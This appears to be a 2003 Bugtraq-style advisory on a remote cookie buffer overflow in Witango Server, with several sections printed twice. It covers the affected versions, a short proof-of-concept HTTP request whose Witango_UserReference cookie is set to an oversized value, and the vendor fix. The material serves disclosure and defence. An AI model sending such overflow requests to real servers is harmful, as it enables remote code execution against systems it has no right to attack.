Witango Server Remote Cookie Buffer Overflow Vulnerability
BID:8224
Info
Witango Server Remote Cookie Buffer Overflow Vulnerability
| Bugtraq ID: | 8224 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 18 2003 12:00AM |
| Updated: | Jul 18 2003 12:00AM |
| Credit: | Discovery credited to Next Generation Software. |
| Vulnerable: |
Witango Witango Server 5.0.1 .061 Witango Tango Server 2000 |
| Not Vulnerable: |
Witango Witango Server 5.0 .1.062 |
Discussion
Witango Server Remote Cookie Buffer Overflow Vulnerability
Witango Server is prone to a remote buffer overflow vulnerability. Remote users may be able to send an HTTP request to a Witango server with a cookie containing a specific variable set to an excessively large value. Remote code execution is possible.
Witango Server is prone to a remote buffer overflow vulnerability. Remote users may be able to send an HTTP request to a Witango server with a cookie containing a specific variable set to an excessively large value. Remote code execution is possible.
Exploit / POC
Witango Server Remote Cookie Buffer Overflow Vulnerability
The following proof of concept has been provided. This may be sent using connection utilities such as netcat.
GET /ngssoftware.tml HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, */*
Accept-Language: en-gb
User-Agent: My Browser
Host: ngssoftware.com
Connection: Keep-Alive
Cookie: Witango_UserReference= parameter length 2864
The following proof of concept has been provided. This may be sent using connection utilities such as netcat.
GET /ngssoftware.tml HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, */*
Accept-Language: en-gb
User-Agent: My Browser
Host: ngssoftware.com
Connection: Keep-Alive
Cookie: Witango_UserReference= parameter length 2864
Solution / Fix
Witango Server Remote Cookie Buffer Overflow Vulnerability
Solution:
Witango has released version 5.0.1.062 to correct this issue. Users are advised to upgrade immediately. For information on obtaining updates, please see the referenced advisory as well as the Witango Web page.
Solution:
Witango has released version 5.0.1.062 to correct this issue. Users are advised to upgrade immediately. For information on obtaining updates, please see the referenced advisory as well as the Witango Web page.
References
Witango Server Remote Cookie Buffer Overflow Vulnerability
References:
References:
- Witango Server product web page (Witango)
- Witango & Tango 2000 Application Server Remote System Buffer Overrun (Next Generation Insight Security Reseach Team )